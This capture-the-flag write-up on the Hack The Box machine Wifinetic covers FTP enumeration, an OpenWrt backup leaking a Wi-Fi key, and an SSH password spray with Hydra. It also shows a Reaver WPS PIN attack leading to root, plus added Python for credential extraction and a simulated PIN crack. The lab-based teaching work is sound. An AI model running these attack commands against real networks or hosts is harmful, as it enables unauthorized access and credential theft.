Description
Wifinetic is an easy Hack The Box machine that features:
- An anonymous FTP server that exposes internal documents and an OpenWrt configuration backup, whose Wi-Fi pre-shared key is reused as an SSH password
- Privilege escalation by recovering a second Wi-Fi password with Reaver through the WPS PIN weakness, a password that is in turn reused for root
Footprinting
First, we check with ping whether the machine is up and use the TTL as a first hint about its operating system. The target IP address is 10.10.11.247.
$ ping -c 3 10.10.11.247
PING 10.10.11.247 (10.10.11.247) 56(84) bytes of data.
64 bytes from 10.10.11.247: icmp_seq=1 ttl=63 time=51.0 ms
64 bytes from 10.10.11.247: icmp_seq=2 ttl=63 time=56.6 ms
64 bytes from 10.10.11.247: icmp_seq=3 ttl=63 time=55.1 ms
--- 10.10.11.247 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 50.966/54.204/56.583/2.372 ms
The machine is up, and a TTL of 63 (a default of 64 minus one hop) suggests a Linux/Unix-like host; this is only a heuristic, since the TTL can be changed on the host or by intermediate devices. Next we run an Nmap TCP SYN scan to find open ports. Without -p this covers only the 1,000 most common ports, so a full -p- scan is worth running afterwards.
$ sudo nmap 10.10.11.247 -sS -oN nmap_scan
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.11.247
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds
We get three open ports, 21, 22 and 53.
Enumeration
Next we run a more detailed scan of those ports with service/version detection (-sV) and the default NSE scripts (-sC).
$ nmap 10.10.11.247 -sV -sC -p21,22,53 -oN nmap_scan_ports
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.11.247
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 2023 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 2023 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 2023 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 2023 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 2023 employees_wellness.pdf
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.11
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds
We have three services: FTP (vsftpd 3.0.3), SSH (OpenSSH 8.2p1 on Ubuntu) and a DNS service on 53/tcp that Nmap can only report as tcpwrapped. The ftp-anon script shows that the FTP server accepts anonymous logins and lists several documents plus an OpenWrt configuration backup. We download everything.
$ lftp anonymous@10.10.11.247
lftp anonymous@10.10.11.247:~> mget *
In the employees_wellness.pdf file we find a letter from the HR Manager Samantha Wood, with the samantha.wood93@wifinetic.htb email address.
...
Best regards,
Samantha Wood
HR Manager
samantha.wood93@wifinetic.htb
In the ProjectOpenWRT.pdf file we find a letter from the Wireless Network Administrator Oliver Walker, with the olivia.walker17@wifinetic.htb email address.
...
Sincerely,
Oliver Walker
Wireless Network Administrator
olivia.walker17@wifinetic.htb
In the MigrateOpenWrt.txt file, the migration checklist mentions Reaver, a wireless auditing tool that attacks WPS.
...
| +-----------------------------------------------+ |
| | Test and Troubleshoot | |
| +-----------------------------------------------+ |
| | | |
| | - Test Wifi connectivity and performance | |
| | - Verify all services are functioning | |
| | - Address and resolve any issues | |
| | - Test for security issues with Reaver tool | |
| | | |
| +-----------------------------------------------+ |
...
We extract the configuration backup file backup-OpenWrt-2023-07-26.tar.
$ tar xvf backup-OpenWrt-2023-07-26.tar
./etc/
./etc/config/
./etc/config/system
./etc/config/wireless
./etc/config/firewall
./etc/config/network
./etc/config/uhttpd
./etc/config/dropbear
./etc/config/ucitrack
./etc/config/rpcd
./etc/config/dhcp
./etc/config/luci
...
In the etc/config/rpcd file we find the login definition of the OpenWrt RPC (ubus/LuCI) user root. Note that '$p$root' is not a literal password: in rpcd a password of the form $p$<user> tells the daemon to check the system password of <user> from /etc/shadow, so this entry does not give us a credential by itself.
$ cat etc/config/rpcd
...
config login
option username 'root'
option password '$p$root'
list read '*'
list write '*'
In the etc/config/wireless file we find the pre-shared key of the Wi-Fi network OpenWrt, VeRyUniUqWiFIPasswrd1!, stored in clear text as UCI keeps it. The same stanza enables WPS (wps_pushbutton '1'), which matters later.
$ cat etc/config/wireless
...
config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'
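Reading the backup by hand works for two files, but an OpenWrt backup carries a dozen UCI files and several packages store credentials. The following is an added example for this writeup, not code from the original page or from OpenWrt: a small parser for the UCI syntax (config / option / list stanzas) that reports the secret-bearing options, tells a plaintext value apart from a crypt(3) hash or a $p$<user> reference, and flags interfaces with WPS enabled. The SECRET_OPTIONS set is a heuristic of common option names, and SAMPLE_FILES is constructed to mirror the wireless and rpcd fragments quoted above.

```python
"""Pull credentials and weak settings out of an OpenWrt UCI backup.

Added example for this writeup; not code from the original page or from
OpenWrt. SAMPLE_FILES is constructed to mirror the backup fragments above.
"""
import re

# Heuristic: option names that carry credentials in common OpenWrt packages.
SECRET_OPTIONS = {"key", "password", "passwd", "secret", "psk"}

# Constructed sample: two UCI files as they would appear in the backup.
SAMPLE_FILES = {
    "etc/config/wireless": """
config wifi-iface 'wifinet0'
    option device 'radio0'
    option mode 'ap'
    option ssid 'OpenWrt'
    option encryption 'psk'
    option key 'VeRyUniUqWiFIPasswrd1!'
    option wps_pushbutton '1'
""",
    "etc/config/rpcd": """
config login
    option username 'root'
    option password '$p$root'
    list read '*'
    list write '*'
""",
}

# keyword, name, then an optional single-quoted, double-quoted or bare value
_UCI_LINE = re.compile(
    r"""^\s*(config|option|list)\s+(\S+)(?:\s+(?:'([^']*)'|"([^"]*)"|(\S+)))?\s*$"""
)


def parse_uci(text):
    """Return [(section_type, section_name_or_None, {option: [values]})].

    'list' entries accumulate under one name; repeated 'option' lines keep
    every value seen so nothing is silently dropped.
    """
    sections = []
    current = None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        m = _UCI_LINE.match(raw)
        if not m:
            raise ValueError(f"unparsable UCI line: {raw!r}")
        kind, name, *quoted = m.groups()
        value = next((v for v in quoted if v is not None), None)
        if kind == "config":
            current = (name, value, {})
            sections.append(current)
        elif current is None:
            raise ValueError(f"{kind} outside of a config section: {raw!r}")
        else:
            current[2].setdefault(name, []).append(value)
    return sections


def classify(value):
    """Distinguish a usable literal from the references rpcd accepts.

    rpcd's 'option password' may be plaintext, a crypt(3) hash, or
    '$p$<user>', meaning "use <user>'s /etc/shadow entry".
    """
    if value.startswith("$p$"):
        return f"system-account reference ({value[3:]})"
    if re.match(r"^\$[0-9a-z]+\$", value):  # $1$, $5$, $6$, $2a$ ... hashes
        return "crypt(3) hash"
    return "plaintext"


def find_secrets(files):
    """Return (path, section, option, value, kind) for every secret option."""
    hits = []
    for path, text in files.items():
        for stype, sname, opts in parse_uci(text):
            label = f"{stype} {sname}" if sname else stype
            for opt, values in opts.items():
                if opt in SECRET_OPTIONS:
                    hits.extend((path, label, opt, v, classify(v)) for v in values)
    return hits


def wps_enabled_ifaces(files):
    """wifi-iface sections with WPS turned on: the surface Reaver attacks."""
    names = []
    for text in files.values():
        for stype, sname, opts in parse_uci(text):
            if stype == "wifi-iface" and opts.get("wps_pushbutton", ["0"])[-1] == "1":
                names.append(sname or opts.get("ssid", ["?"])[-1])
    return names


if __name__ == "__main__":
    for hit in find_secrets(SAMPLE_FILES):
        print(" | ".join(hit))
    print("WPS enabled on:", ", ".join(wps_enabled_ifaces(SAMPLE_FILES)))
```

To run it against a real backup, replace SAMPLE_FILES with a dict built from the extracted etc/config/ directory; the parser raises on a line it does not understand rather than skipping it, so a malformed or unusual file is noticed instead of silently losing a credential.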
The backup also contains etc/passwd, so we extract the user names into a list to use in a password spray.
$ cut -d: -f1 etc/passwd > users
Exploitation
Now we run a password spray against the SSH service: the one password we have (the Wi-Fi key) against every user from the backup. Hydra's warning below is worth heeding on real targets, since OpenSSH limits concurrent unauthenticated connections (MaxStartups); -t 4 avoids losing attempts to dropped connections.
$ hydra -L users -p 'VeRyUniUqWiFIPasswrd1!' ssh://10.10.11.247
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra)
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://10.10.11.247:22/
[22][ssh] host: 10.10.11.247 login: netadmin password: VeRyUniUqWiFIPasswrd1!
We get a hit for the netadmin user and log in over SSH.
$ ssh netadmin@10.10.11.247
...
netadmin@wifinetic:~$ id
uid=1000(netadmin) gid=1000(netadmin) groups=1000(netadmin)
Post-Exploitation
Listing the wireless interfaces with iw shows that the host has several of them.
netadmin@wifinetic:~$ iw dev
phy#2
Interface mon0
ifindex 7
wdev 0x200000002
addr 02:00:00:00:02:00
type monitor
txpower 20.00 dBm
Interface wlan2
ifindex 5
wdev 0x200000001
addr 02:00:00:00:02:00
type managed
txpower 20.00 dBm
phy#1
Unnamed/non-netdev interface
wdev 0x1000000b9
addr 42:00:00:00:01:00
type P2P-device
txpower 20.00 dBm
Interface wlan1
ifindex 4
wdev 0x100000001
addr 02:00:00:00:01:00
ssid OpenWrt
type managed
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
phy#0
Interface wlan0
ifindex 3
wdev 0x1
addr 02:00:00:00:00:00
ssid OpenWrt
type AP
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
There is an interface in monitor mode (mon0), which is what a WPS audit needs, and the migration notes already pointed us to Reaver. wlan0 is the access point itself (type AP, SSID OpenWrt, BSSID 02:00:00:00:00:00), while wlan1 is a client associated to it. We point Reaver at the AP: -i selects the monitor interface, -b the target BSSID and -vv raises the verbosity. Reaver injects raw 802.11 frames, which normally requires root or the CAP_NET_RAW capability on the binary; getcap $(command -v reaver) shows whether an unprivileged user can run it.
netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 2 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.
Reaver's first guess is 12345670, a well-known default WPS PIN, and the AP accepts it immediately; the M7 message of the WPS exchange then hands over the WPA PSK, WhatIsRealAnDWhAtIsNot51121!. Even a non-default PIN would not have held for long: the eighth digit is a checksum and the AP confirms the first four digits (M4) separately from the remaining three (M6), so the search space is at most about 11,000 PINs rather than 10^7. The recovered passphrase is reused as the root password, so we can switch to a root shell with su.
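To make the 11,000-attempt figure concrete, here is an added example for this writeup, not code from the original page or from Reaver: the WPS PIN checksum, and a two-stage search run against a constructed SimulatedAP that answers the half-PIN checks the way a real AP's M4 and M6 responses do (a NACK for a wrong half, the PSK in M7 once the full PIN is accepted). No 802.11 frames are sent; the "AP", its PIN and the second test PIN 98765430 are made up for the demonstration, and the default-PIN-first ordering mirrors what Reaver did above.

```python
"""Why a WPS PIN falls quickly: the checksum digit and the split-half oracle.

Added example for this writeup; not code from the original page or from
Reaver. SimulatedAP is a constructed stand-in for the AP side of the WPS
registrar exchange; nothing here touches a wireless interface.
"""


def wps_checksum(first_seven: int) -> int:
    """Checksum digit for the 7 significant digits of a WPS PIN."""
    accum, pin = 0, first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the WPS checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class SimulatedAP:
    """Constructed model of the AP in the WPS external-registrar protocol.

    check_first_half mirrors M4 (the AP's reply reveals whether digits 1-4
    are right), check_second_half mirrors M6 (digits 5-8), and reveal_psk
    mirrors M7, which carries the WPA PSK once the full PIN is accepted.
    """

    def __init__(self, pin: str, psk: str):
        if not is_valid_pin(pin):
            raise ValueError("PIN fails the WPS checksum")
        self._pin, self._psk = pin, psk
        self.exchanges = 0  # half-PIN checks the attacker needed so far

    def check_first_half(self, half: str) -> bool:
        self.exchanges += 1
        return half == self._pin[:4]

    def check_second_half(self, half: str) -> bool:
        self.exchanges += 1
        return half == self._pin[4:]

    def reveal_psk(self, pin: str):
        return self._psk if pin == self._pin else None


def crack_pin(ap: SimulatedAP, priority_pins=("12345670",)) -> str:
    """Two-stage search: 10**4 first halves, then 10**3 valid second halves.

    Well-known PINs are tried first, as Reaver does with 12345670.
    """
    firsts = list(dict.fromkeys([p[:4] for p in priority_pins] + [f"{i:04d}" for i in range(10_000)]))
    thirds = list(dict.fromkeys([p[4:7] for p in priority_pins] + [f"{i:03d}" for i in range(1_000)]))
    first = next((h for h in firsts if ap.check_first_half(h)), None)
    if first is None:
        raise RuntimeError("no first half matched")
    for t in thirds:
        tail = t + str(wps_checksum(int(first + t)))  # only 1 in 10 tails is valid
        if ap.check_second_half(tail):
            return first + tail
    raise RuntimeError("no second half matched")


if __name__ == "__main__":
    ap = SimulatedAP("12345670", "WhatIsRealAnDWhAtIsNot51121!")
    pin = crack_pin(ap)
    print(f"PIN {pin} after {ap.exchanges} exchanges, PSK {ap.reveal_psk(pin)!r}")
    worst = SimulatedAP("98765430", "example-psk")
    crack_pin(worst)
    print(f"non-default PIN needed {worst.exchanges} exchanges (naive search: 10**7)")
```

The default PIN costs two exchanges, exactly the M4 and M6 round trips seen in the Reaver output above; a PIN near the end of both ranges still costs only about ten thousand. The real mitigation is to disable WPS (wps_pushbutton '0' in the UCI wireless config) rather than to pick a better PIN, since the protocol, not the PIN, is what leaks the halves.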
netadmin@wifinetic:~$ su root
Password:
root@wifinetic:/home/netadmin# id
uid=0(root) gid=0(root) groups=0(root)
Flags
In the root shell we can retrieve the user.txt and root.txt flags.
root@wifinetic:/home/netadmin# cat /home/netadmin/user.txt
<REDACTED>
root@wifinetic:/home/netadmin# cat /root/root.txt
<REDACTED>